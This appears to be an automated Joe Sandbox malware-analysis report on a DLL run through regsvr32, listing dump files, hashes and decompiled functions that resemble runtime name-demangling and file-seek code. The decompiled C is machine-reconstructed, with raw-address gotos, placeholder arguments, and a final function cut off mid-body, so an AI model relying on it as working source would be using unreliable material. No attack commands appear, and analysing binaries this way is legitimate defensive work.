                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001800487AC), ref: 0000000180048581
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ConsoleErrorLastMode
                                                                      • String ID:
                                                                      • API String ID: 953036326-0
                                                                      • Opcode ID: 905081ba84636eacf27c091b9a6f146236fe63975cf16d914d711a63dc72bfd6
                                                                      • Instruction ID: b99cb4dcfcf6b88192848261ad10a476b178633c1dd7a54aab14b0c7e444e33d
                                                                      • Opcode Fuzzy Hash: 905081ba84636eacf27c091b9a6f146236fe63975cf16d914d711a63dc72bfd6
                                                                      • Instruction Fuzzy Hash: D4910172710E588AFBE2DB6598807ED27A0FB48BCCF568506FE0A53694DF34C689D704
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 83%
                                                                      			E0000000118002EF74(void* __eflags, long long __rbx, signed long long* __rcx, long long __rsi, long long __r12, long long _a8, long long _a16, long long _a24) {
                                                                      				void* _v24;
                                                                      				char _v56;
                                                                      				char _v72;
                                                                      				signed int _v80;
                                                                      				signed long long _v88;
                                                                      				signed long long _v96;
                                                                      				char _v104;
                                                                      				signed int _v112;
                                                                      				char _v120;
                                                                      				signed int _t70;
                                                                      				void* _t85;
                                                                      				void* _t86;
                                                                      				void* _t87;
                                                                      				void* _t96;
                                                                      				signed int _t97;
                                                                      				signed int _t99;
                                                                      				signed int _t100;
                                                                      				signed long long _t107;
                                                                      				void* _t125;
                                                                      				intOrPtr* _t127;
                                                                      				intOrPtr* _t128;
                                                                      				long long _t130;
                                                                      				long long _t131;
                                                                      				signed char* _t132;
                                                                      				intOrPtr* _t133;
                                                                      				intOrPtr* _t135;
                                                                      				char* _t136;
                                                                      				signed long long* _t140;
                                                                      				void* _t156;
                                                                      				void* _t164;
                                                                      				void* _t171;
                                                                      				void* _t176;
                                                                      				void* _t177;
                                                                      				signed long long _t181;
                                                                      				long long _t183;
                                                                      
                                                                      				_t179 = __r12;
                                                                      				_t165 = __rsi;
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rsi;
                                                                      				_a24 = __r12;
                                                                      				_t140 = __rcx;
                                                                      				 *0x800738cc =  *0x800738cc + 1;
                                                                      				_t70 =  *0x800738b8; // 0x0
                                                                      				asm("bt eax, 0xd");
                                                                      				if (__eflags >= 0) goto 0x8002efd6;
                                                                      				asm("btr eax, 0xd");
                                                                      				 *0x800738b8 = _t70;
                                                                      				E000000011800330FC(_t87, __eflags, _t125, __rcx,  &_v104, _t156, __rsi);
                                                                      				asm("bts dword [0x448f4], 0xd");
                                                                      				 *_t140 = _v104;
                                                                      				_t140[1] = _v96;
                                                                      				goto 0x8002f232;
                                                                      				_t127 =  *0x800738a8; // 0x0
                                                                      				if ( *_t127 != 0x3f) goto 0x8002f216;
                                                                      				_t128 = _t127 + 1;
                                                                      				 *0x800738a8 = _t128;
                                                                      				if ( *_t128 != 0x3f) goto 0x8002f046;
                                                                      				if ( *((intOrPtr*)(_t128 + 1)) != 0x3f) goto 0x8002f021;
                                                                      				E0000000118002EF74( *((intOrPtr*)(_t128 + 1)) - 0x3f, _t140,  &_v104, __rsi, __r12);
                                                                      				_t130 =  *0x800738a8; // 0x0
                                                                      				goto 0x8002f01a;
                                                                      				_t131 = _t130 + 1;
                                                                      				 *0x800738a8 = _t131;
                                                                      				if ( *_t131 != 0) goto 0x8002f010;
                                                                      				goto 0x8002efc4;
                                                                      				if ( *_t131 != 0x24) goto 0x8002f033;
                                                                      				E00000001180030F6C(_t86,  *_t127, 1, _t96, _t140,  &_v120, _t156, _t164, _t165);
                                                                      				goto 0x8002f054;
                                                                      				 *0x800738a8 = _t131;
                                                                      				r8d = 0;
                                                                      				E0000000118002F58C( *_t127, 0, _t140,  &_v120, _t164, _t165, _t171, _t179);
                                                                      				goto 0x8002f054;
                                                                      				r8d = 0;
                                                                      				E0000000118002F2A4(_t86, 1, _t140,  &_v120, _t164, _t165);
                                                                      				_t97 = _v112;
                                                                      				_t181 = _v120;
                                                                      				_t107 = _t181;
                                                                      				if (_t107 == 0) goto 0x8002f06e;
                                                                      				asm("bt esi, 0x9");
                                                                      				if (_t107 >= 0) goto 0x8002f06e;
                                                                      				r12d = 1;
                                                                      				goto 0x8002f071;
                                                                      				r12d = 0;
                                                                      				r15d = _t97;
                                                                      				r15d = r15d >> 0xf;
                                                                      				r15d = r15d & 0x00000001;
                                                                      				if (_v112 - 1 <= 0) goto 0x8002f08d;
                                                                      				 *_t140 = _t181;
                                                                      				_t140[1] = _t97;
                                                                      				goto 0x8002f232;
                                                                      				_t132 =  *0x800738a8; // 0x0
                                                                      				if (( *_t132 & 0x000000bf) == 0) goto 0x8002f180;
                                                                      				E0000000118002FF80(_t86, _t140,  &_v104, _t164, _t165, _t179);
                                                                      				if (_v104 == 0) goto 0x8002f180;
                                                                      				if ( *0x800738bc == 0) goto 0x8002f137;
                                                                      				 *0x800738bc = 0;
                                                                      				E0000000118002E98C( &_v120,  &_v88,  &_v104);
                                                                      				_v120 =  *_t132;
                                                                      				_v112 = _t132[8];
                                                                      				_t133 =  *0x800738a8; // 0x0
                                                                      				if ( *_t133 == 0x40) goto 0x8002f180;
                                                                      				E0000000118002FF80(_t86, _t140,  &_v88, _t164, _t165, _t179);
                                                                      				_v104 =  *_t133;
                                                                      				_v96 =  *(_t133 + 8);
                                                                      				_v88 = "::";
                                                                      				_v80 = 2;
                                                                      				asm("movaps xmm0, [ebp-0x40]");
                                                                      				asm("movdqa [ebp-0x40], xmm0");
                                                                      				E0000000118002E960( &_v104,  &_v72,  &_v88);
                                                                      				goto 0x8002f167;
                                                                      				_t135 = "::";
                                                                      				_v88 = _t135;
                                                                      				_v80 = 2;
                                                                      				asm("movaps xmm0, [ebp-0x40]");
                                                                      				asm("movdqa [ebp-0x40], xmm0");
                                                                      				E0000000118002E960( &_v104,  &_v56,  &_v88);
                                                                      				E0000000118002E98C(_t135,  &_v72,  &_v120);
                                                                      				_t99 =  *(_t135 + 8);
                                                                      				_t183 =  *_t135;
                                                                      				_v112 = _t99;
                                                                      				_v120 = _t183;
                                                                      				if (r12d == 0) goto 0x8002f191;
                                                                      				if (_t183 == 0) goto 0x8002f191;
                                                                      				asm("bts esi, 0x9");
                                                                      				_v112 = _t99;
                                                                      				if (r15d == 0) goto 0x8002f1a0;
                                                                      				_t100 = _t99 | 0x00008000;
                                                                      				_v112 = _t100;
                                                                      				if (_t183 == 0) goto 0x8002f082;
                                                                      				if ((0x00001000 & _t100) != 0) goto 0x8002f082;
                                                                      				_t136 =  *0x800738a8; // 0x0
                                                                      				if ( *_t136 == 0) goto 0x8002f1dc;
                                                                      				if ( *_t136 == 0x40) goto 0x8002f1d5;
                                                                      				_t140[1] = _t140[1] & 0x00000000;
                                                                      				_t140[1] = 2;
                                                                      				 *_t140 =  *_t140 & 0x00000000;
                                                                      				goto 0x8002f232;
                                                                      				 *0x800738a8 =  *0x800738a8 + 1;
                                                                      				if (( *0x800738b8 & 0x00001000) == 0) goto 0x8002f208;
                                                                      				if (r12d != 0) goto 0x8002f208;
                                                                      				if ((0x00008000 & _t100) != 0) goto 0x8002f208;
                                                                      				_v88 = _v88 & 0x00000000;
                                                                      				_v80 = _v80 & r12d;
                                                                      				E00000001180031B10(_t140,  &_v56,  &_v88, _t176, _t177);
                                                                      				goto 0x8002f082;
                                                                      				_t85 = E00000001180031B10(_t140, _t140,  &_v120, _t176, _t177);
                                                                      				goto 0x8002f232;
                                                                      				 *_t140 =  *_t140 & 0x00000000;
                                                                      				_t140[1] = _t140[1] & 0x00000000;
                                                                      				if (0x8000 == 0) goto 0x8002f228;
                                                                      				_t140[1] = 2;
                                                                      				goto 0x8002f232;
                                                                      				 *_t140 = 0x8005fee0;
                                                                      				 *0x800738cc =  *0x800738cc - 1;
                                                                      				return _t85;
                                                                      			}






































                                                                      0x18002ef74
                                                                      0x18002ef74
                                                                      0x18002ef74
                                                                      0x18002ef79
                                                                      0x18002ef7e
                                                                      0x18002ef92
                                                                      0x18002ef95
                                                                      0x18002ef9b
                                                                      0x18002efa1
                                                                      0x18002efa5
                                                                      0x18002efa7
                                                                      0x18002efab
                                                                      0x18002efb7
                                                                      0x18002efbc
                                                                      0x18002efc8
                                                                      0x18002efce
                                                                      0x18002efd1
                                                                      0x18002efd6
                                                                      0x18002efe3
                                                                      0x18002efe9
                                                                      0x18002efec
                                                                      0x18002eff5
                                                                      0x18002effc
                                                                      0x18002f002
                                                                      0x18002f007
                                                                      0x18002f00e
                                                                      0x18002f010
                                                                      0x18002f013
                                                                      0x18002f01d
                                                                      0x18002f01f
                                                                      0x18002f028
                                                                      0x18002f02c
                                                                      0x18002f031
                                                                      0x18002f033
                                                                      0x18002f03a
                                                                      0x18002f03f
                                                                      0x18002f044
                                                                      0x18002f046
                                                                      0x18002f04f
                                                                      0x18002f054
                                                                      0x18002f057
                                                                      0x18002f05b
                                                                      0x18002f05e
                                                                      0x18002f060
                                                                      0x18002f064
                                                                      0x18002f066
                                                                      0x18002f06c
                                                                      0x18002f06e
                                                                      0x18002f071
                                                                      0x18002f074
                                                                      0x18002f078
                                                                      0x18002f080
                                                                      0x18002f082
                                                                      0x18002f085
                                                                      0x18002f088
                                                                      0x18002f08d
                                                                      0x18002f097
                                                                      0x18002f0a1
                                                                      0x18002f0ab
                                                                      0x18002f0b8
                                                                      0x18002f0ba
                                                                      0x18002f0cd
                                                                      0x18002f0d5
                                                                      0x18002f0dc
                                                                      0x18002f0df
                                                                      0x18002f0e9
                                                                      0x18002f0f3
                                                                      0x18002f0fb
                                                                      0x18002f102
                                                                      0x18002f10c
                                                                      0x18002f110
                                                                      0x18002f117
                                                                      0x18002f11b
                                                                      0x18002f12c
                                                                      0x18002f135
                                                                      0x18002f137
                                                                      0x18002f13e
                                                                      0x18002f142
                                                                      0x18002f149
                                                                      0x18002f14d
                                                                      0x18002f15e
                                                                      0x18002f16e
                                                                      0x18002f173
                                                                      0x18002f176
                                                                      0x18002f179
                                                                      0x18002f17c
                                                                      0x18002f183
                                                                      0x18002f188
                                                                      0x18002f18a
                                                                      0x18002f18e
                                                                      0x18002f199
                                                                      0x18002f19b
                                                                      0x18002f19d
                                                                      0x18002f1a3
                                                                      0x18002f1b0
                                                                      0x18002f1b6
                                                                      0x18002f1c0
                                                                      0x18002f1c5
                                                                      0x18002f1c7
                                                                      0x18002f1cb
                                                                      0x18002f1cf
                                                                      0x18002f1d3
                                                                      0x18002f1d5
                                                                      0x18002f1e2
                                                                      0x18002f1e7
                                                                      0x18002f1eb
                                                                      0x18002f1ed
                                                                      0x18002f1f2
                                                                      0x18002f1fe
                                                                      0x18002f203
                                                                      0x18002f20f
                                                                      0x18002f214
                                                                      0x18002f216
                                                                      0x18002f21a
                                                                      0x18002f220
                                                                      0x18002f222
                                                                      0x18002f226
                                                                      0x18002f22f
                                                                      0x18002f232
                                                                      0x18002f257

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Name::operator+
                                                                      • String ID:
                                                                      • API String ID: 2943138195-0
                                                                      • Opcode ID: c2526d3b166b1c49e3e130968c3dcc372194324d964ad8ea7e157ade71e261a6
                                                                      • Instruction ID: 31f2029e261bee594be8205564a68e5f2e61a9b1e21e9ccd8e047856a1e9627b
                                                                      • Opcode Fuzzy Hash: c2526d3b166b1c49e3e130968c3dcc372194324d964ad8ea7e157ade71e261a6
                                                                      • Instruction Fuzzy Hash: 6F913B72A0079899F7A38BA4D8813EC37B1B3097C8F55C026EE4927799DF798A4DC750
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 84%
                                                                      			E00000001180033D5C(void* __eflags, long long __rbx, signed long long* __rcx, void* __rdx, long long __rdi, char* __r8, void* __r10, long long _a8, long long _a16) {
                                                                      				char _v24;
                                                                      				char _v40;
                                                                      				signed int _v48;
                                                                      				signed int _v56;
                                                                      				char _t41;
                                                                      				void* _t50;
                                                                      				intOrPtr* _t76;
                                                                      				char* _t77;
                                                                      				intOrPtr* _t78;
                                                                      				char* _t79;
                                                                      				signed long long* _t86;
                                                                      				long long _t89;
                                                                      				char* _t90;
                                                                      				signed long long _t98;
                                                                      				long long _t104;
                                                                      				signed long long _t118;
                                                                      				char* _t120;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rdi;
                                                                      				_v56 = _v56 & 0x00000000;
                                                                      				_t86 = __rcx;
                                                                      				_t89 =  *0x800738a8; // 0x0
                                                                      				_t120 = __r8;
                                                                      				_v48 = _v48 & 0x00000000;
                                                                      				_t90 = _t89 + 1;
                                                                      				 *0x800738a8 = _t90;
                                                                      				r10d =  *_t90;
                                                                      				r8d = r10d;
                                                                      				r8d = r8d - 0x41;
                                                                      				if (__eflags == 0) goto 0x80033f11;
                                                                      				r8d = r8d - 1;
                                                                      				if (__eflags == 0) goto 0x80033ee3;
                                                                      				if (r8d == 1) goto 0x80033edb;
                                                                      				if ( *_t90 == 0) goto 0x80033ecf;
                                                                      				_t41 =  *((char*)(_t90 + 1));
                                                                      				if (_t41 == 0) goto 0x80033ecf;
                                                                      				if (r9d != 0) goto 0x80033ee8;
                                                                      				r10d = r10d << 4;
                                                                      				_t8 = _t90 + 2; // 0x3
                                                                      				_t76 = _t8;
                                                                      				 *0x800738a8 = _t76;
                                                                      				if (_t41 + 0xfffffcd0 + r10d - 1 <= 0) goto 0x80033e23;
                                                                      				E0000000118002E674(E0000000118002EE78(0x2c, _t76, __rcx,  &_v56),  &_v40, __rdx, __r10);
                                                                      				E0000000118002E98C( &_v56,  &_v24, _t76);
                                                                      				_v56 =  *_t76;
                                                                      				_v48 =  *((intOrPtr*)(_t76 + 8));
                                                                      				r8b = 0x3e;
                                                                      				E0000000118002E9B8( &_v56,  &_v24);
                                                                      				_t77 =  *0x800738a8; // 0x0
                                                                      				_v56 =  *_t76;
                                                                      				_v48 =  *((intOrPtr*)(_t76 + 8));
                                                                      				if ( *_t77 != 0x24) goto 0x80033e58;
                                                                      				_t78 = _t77 + 1;
                                                                      				 *0x800738a8 = _t78;
                                                                      				goto 0x80033e7c;
                                                                      				r8b = 0x5e;
                                                                      				E0000000118002E9B8( &_v56,  &_v24);
                                                                      				_t98 =  *_t78;
                                                                      				_t79 =  *0x800738a8; // 0x0
                                                                      				_v56 = _t98;
                                                                      				_v48 =  *((intOrPtr*)(_t78 + 8));
                                                                      				_t118 = _t98;
                                                                      				if ( *_t79 == 0) goto 0x80033e90;
                                                                      				 *0x800738a8 = _t79 + 1;
                                                                      				goto 0x80033ec0;
                                                                      				if (_v48 - 1 > 0) goto 0x80033ec0;
                                                                      				if (_t118 == 0) goto 0x80033eb4;
                                                                      				E000000011800367C8(_t79 + 1, _t86,  &_v56, 0x8005fee0);
                                                                      				goto 0x80033ec0;
                                                                      				asm("bts edx, 0xe");
                                                                      				 *_t86 = 0x8005fee0;
                                                                      				_t86[1] = 1;
                                                                      				goto 0x80033f50;
                                                                      				 *_t86 = 0x8005fee0;
                                                                      				goto 0x80033f4c;
                                                                      				 *0x8005fee0 = 5;
                                                                      				goto 0x80033f05;
                                                                      				if (r9d == 0) goto 0x80033ef6;
                                                                      				_t86[1] = _t86[1] & 0x00000000;
                                                                      				 *_t86 =  *_t86 & 0x00000000;
                                                                      				_t86[1] = 2;
                                                                      				goto 0x80033f50;
                                                                      				 *_t120 = 1;
                                                                      				E0000000118002EE78(0x3e, _t79 + 1, _t86,  &_v56);
                                                                      				goto 0x80033f41;
                                                                      				if (r9d != 0) goto 0x80033f3d;
                                                                      				r8d =  *0x8005fee0;
                                                                      				_t35 = _t118 - 2; // -67
                                                                      				_t50 = _t35;
                                                                      				if (_t50 - 1 <= 0) goto 0x80033f30;
                                                                      				if (r8d != 1) goto 0x80033f3d;
                                                                      				 *0x8005fee0 = 4;
                                                                      				goto 0x80033f36;
                                                                      				 *0x8005fee0 = 5;
                                                                      				_t104 =  *0x800738a8; // 0x0
                                                                      				_t36 = _t104 + 1; // 0x1
                                                                      				 *_t86 =  *_t86 & 0x00000000;
                                                                      				 *0x800738a8 = _t36;
                                                                      				_t86[1] = _t86[1] & 0x00000000;
                                                                      				return _t50;
                                                                      			}




















                                                                      0x180033d5c
                                                                      0x180033d61
                                                                      0x180033d6e
                                                                      0x180033d73
                                                                      0x180033d76
                                                                      0x180033d7d
                                                                      0x180033d80
                                                                      0x180033d84
                                                                      0x180033d87
                                                                      0x180033d8e
                                                                      0x180033d92
                                                                      0x180033d95
                                                                      0x180033d99
                                                                      0x180033d9f
                                                                      0x180033da3
                                                                      0x180033dad
                                                                      0x180033db6
                                                                      0x180033dbc
                                                                      0x180033dc2
                                                                      0x180033dcb
                                                                      0x180033dd3
                                                                      0x180033ddd
                                                                      0x180033ddd
                                                                      0x180033de4
                                                                      0x180033dee
                                                                      0x180033e01
                                                                      0x180033e11
                                                                      0x180033e1c
                                                                      0x180033e20
                                                                      0x180033e23
                                                                      0x180033e2e
                                                                      0x180033e39
                                                                      0x180033e40
                                                                      0x180033e44
                                                                      0x180033e4a
                                                                      0x180033e4c
                                                                      0x180033e4f
                                                                      0x180033e56
                                                                      0x180033e58
                                                                      0x180033e63
                                                                      0x180033e68
                                                                      0x180033e6e
                                                                      0x180033e75
                                                                      0x180033e79
                                                                      0x180033e7f
                                                                      0x180033e82
                                                                      0x180033e87
                                                                      0x180033e8e
                                                                      0x180033e94
                                                                      0x180033e99
                                                                      0x180033ea6
                                                                      0x180033eb2
                                                                      0x180033ec0
                                                                      0x180033ec4
                                                                      0x180033ec7
                                                                      0x180033eca
                                                                      0x180033ed6
                                                                      0x180033ed9
                                                                      0x180033edb
                                                                      0x180033ee1
                                                                      0x180033ee6
                                                                      0x180033ee8
                                                                      0x180033eec
                                                                      0x180033ef0
                                                                      0x180033ef4
                                                                      0x180033ef8
                                                                      0x180033f00
                                                                      0x180033f0f
                                                                      0x180033f14
                                                                      0x180033f16
                                                                      0x180033f19
                                                                      0x180033f19
                                                                      0x180033f20
                                                                      0x180033f26
                                                                      0x180033f28
                                                                      0x180033f2e
                                                                      0x180033f30
                                                                      0x180033f36
                                                                      0x180033f3d
                                                                      0x180033f41
                                                                      0x180033f45
                                                                      0x180033f4c
                                                                      0x180033f62

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Name::operator+$NameName::
                                                                      • String ID:
                                                                      • API String ID: 168861036-0
                                                                      • Opcode ID: 3153dbdbe76ab06782357a2a955f00da57a419d08adc32f6e1870be14f76b117
                                                                      • Instruction ID: 80ecb71dc925bc62b9cf925ee735774e25e718a7442b89bf41a9dedd2d81e6d8
                                                                      • Opcode Fuzzy Hash: 3153dbdbe76ab06782357a2a955f00da57a419d08adc32f6e1870be14f76b117
                                                                      • Instruction Fuzzy Hash: 7C516D72A1465899F793CF24E8813EE37B1E349B88F95C016FA0957795CF3AC649C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 91%
                                                                      			E00000001180030434(void* __ebx, signed int __ecx, void* __eflags, intOrPtr* __rax, long long __rbx, signed long long* __rcx, void* __rdx, void* __rdi, void* __rsi, void* __r8, void* __r12, long long __r14, long long _a8, long long _a16) {
                                                                      				char _v24;
                                                                      				char _v40;
                                                                      				char _v56;
                                                                      				signed int _v64;
                                                                      				char _v72;
                                                                      				signed int _t36;
                                                                      				signed int _t43;
                                                                      				signed int _t45;
                                                                      				intOrPtr* _t55;
                                                                      				intOrPtr* _t56;
                                                                      				char* _t57;
                                                                      				char* _t58;
                                                                      				signed long long* _t62;
                                                                      				signed long long _t70;
                                                                      				long long _t92;
                                                                      
                                                                      				_t80 = __rsi;
                                                                      				_t79 = __rdi;
                                                                      				_t55 = __rax;
                                                                      				_t45 = __ecx;
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __r14;
                                                                      				 *__rcx =  *__rcx & 0x00000000;
                                                                      				_t62 = __rcx;
                                                                      				__rcx[1] = __rcx[1] & 0x00000000;
                                                                      				r8d = 0;
                                                                      				E0000000118002F2A4(__ebx, 1, __rcx,  &_v56, __rdi, __rsi);
                                                                      				_t92 = "::";
                                                                      				 *__rcx =  *_t55;
                                                                      				_t36 =  *(_t55 + 8);
                                                                      				__rcx[1] = _t36;
                                                                      				_t56 =  *0x800738a8; // 0x0
                                                                      				if (_t36 != 0) goto 0x800304d6;
                                                                      				if ( *_t56 == 0) goto 0x800304d6;
                                                                      				if ( *_t56 == 0x40) goto 0x800304db;
                                                                      				_v72 = _t92;
                                                                      				_v64 = 2;
                                                                      				asm("movaps xmm0, [ebp-0x40]");
                                                                      				asm("movdqa [ebp-0x40], xmm0");
                                                                      				E0000000118002FF80(__ebx, __rcx,  &_v56, _t79, _t80, __r12);
                                                                      				E0000000118002E960(_t56,  &_v40,  &_v72);
                                                                      				E0000000118002E98C(_t56,  &_v24, _t62);
                                                                      				_t70 =  *_t56;
                                                                      				 *_t62 = _t70;
                                                                      				_t62[1] =  *(_t56 + 8);
                                                                      				_t57 =  *0x800738a8; // 0x0
                                                                      				if ( *_t57 != 0x40) goto 0x800304e7;
                                                                      				_t58 = _t57 + 1;
                                                                      				 *0x800738a8 = _t58;
                                                                      				goto 0x8003055a;
                                                                      				if ( *_t58 == 0) goto 0x800304fa;
                                                                      				_t62[1] = _t62[1] & 0x00000000;
                                                                      				 *_t62 =  *_t62 & 0x00000000;
                                                                      				_t62[1] = 2;
                                                                      				goto 0x8003055a;
                                                                      				if (_t70 != 0) goto 0x80030512;
                                                                      				_t62[1] = _t62[1] & _t45;
                                                                      				_t62[1] = 1;
                                                                      				 *_t62 = 0x8005fee0;
                                                                      				goto 0x8003055a;
                                                                      				_v72 = _t92;
                                                                      				_v64 = 2;
                                                                      				asm("movaps xmm0, [ebp-0x40]");
                                                                      				_v64 = _v64 & 0x00000000;
                                                                      				asm("movdqa [ebp-0x30], xmm0");
                                                                      				_v72 = 0x8005fee0;
                                                                      				E0000000118002E960( &_v72,  &_v24,  &_v56);
                                                                      				E0000000118002E98C(0x8005fee0,  &_v40, _t62);
                                                                      				 *_t62 =  *0x8005fee0;
                                                                      				_t43 =  *0x18005FEE8;
                                                                      				_t62[1] = _t43;
                                                                      				return _t43;
                                                                      			}


















                                                                      0x180030434
                                                                      0x180030434
                                                                      0x180030434
                                                                      0x180030434
                                                                      0x180030434
                                                                      0x180030439
                                                                      0x180030446
                                                                      0x18003044a
                                                                      0x18003044d
                                                                      0x180030451
                                                                      0x18003045a
                                                                      0x18003045f
                                                                      0x180030469
                                                                      0x18003046c
                                                                      0x180030471
                                                                      0x180030474
                                                                      0x18003047b
                                                                      0x180030480
                                                                      0x180030485
                                                                      0x180030487
                                                                      0x18003048f
                                                                      0x180030496
                                                                      0x18003049a
                                                                      0x18003049f
                                                                      0x1800304af
                                                                      0x1800304be
                                                                      0x1800304c3
                                                                      0x1800304c6
                                                                      0x1800304cc
                                                                      0x1800304cf
                                                                      0x1800304d9
                                                                      0x1800304db
                                                                      0x1800304de
                                                                      0x1800304e5
                                                                      0x1800304ea
                                                                      0x1800304ec
                                                                      0x1800304f0
                                                                      0x1800304f4
                                                                      0x1800304f8
                                                                      0x180030504
                                                                      0x180030506
                                                                      0x180030509
                                                                      0x18003050d
                                                                      0x180030510
                                                                      0x180030512
                                                                      0x18003051a
                                                                      0x180030525
                                                                      0x18003052d
                                                                      0x180030531
                                                                      0x180030536
                                                                      0x18003053a
                                                                      0x180030549
                                                                      0x180030551
                                                                      0x180030554
                                                                      0x180030557
                                                                      0x18003056c

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Name::operator+$Replicator::operator[]
                                                                      • String ID:
                                                                      • API String ID: 3863519203-0
                                                                      • Opcode ID: 69cc28c128ffa0f1dc8f38d03f4fe8aa268bfa52d5ffbdb915afa97d34e67610
                                                                      • Instruction ID: 87920afd8a171e3cb13d5d4911d49152bdfebf09f702a0f65a38a30139f2a60a
                                                                      • Opcode Fuzzy Hash: 69cc28c128ffa0f1dc8f38d03f4fe8aa268bfa52d5ffbdb915afa97d34e67610
                                                                      • Instruction Fuzzy Hash: FD415872A01B8889FB42CFA8D8913ED77A0F349B88F64C016EB4957759DF388689C710
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 19%
                                                                      			E000000011800573EC(signed int __ecx, void* __edx, void* __esi, void* __eflags, long long __rbx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32) {
                                                                      				void* _v16;
                                                                      				long long _v24;
                                                                      				int _t35;
                                                                      				long long _t51;
                                                                      				void* _t62;
                                                                      				long long _t76;
                                                                      				void* _t83;
                                                                      
                                                                      				_t62 = __rdx;
                                                                      				_t51 = _t76;
                                                                      				 *((long long*)(_t51 + 8)) = __rbx;
                                                                      				 *((long long*)(_t51 + 0x10)) = __rbp;
                                                                      				 *((long long*)(_t51 + 0x18)) = __rsi;
                                                                      				 *((long long*)(_t51 + 0x20)) = __rdi;
                                                                      				E000000011800474DC(__esi, __edx, _t51);
                                                                      				if (_t51 != 0xffffffff) goto 0x80057434;
                                                                      				 *((intOrPtr*)(__r9 + 0x2c)) = 9;
                                                                      				 *((char*)(__r9 + 0x30)) = 1;
                                                                      				goto 0x800574cd;
                                                                      				_t8 = _t62 + 1; // 0x1
                                                                      				r9d = _t8;
                                                                      				if (SetFilePointerEx(_t83, ??, ??) != 0) goto 0x8005745e;
                                                                      				E0000000118003C1BC(GetLastError(), __r9);
                                                                      				goto 0x8005742c;
                                                                      				_v24 = _t51;
                                                                      				r9d = r8d;
                                                                      				if (SetFilePointerEx(??, ??, ??, ??) == 0) goto 0x8005744c;
                                                                      				if (_v24 - 0x7fffffff <= 0) goto 0x800574a7;
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				_t35 = SetFilePointerEx(??, ??, ??, ??);
                                                                      				 *((intOrPtr*)(__r9 + 0x2c)) = 0x16;
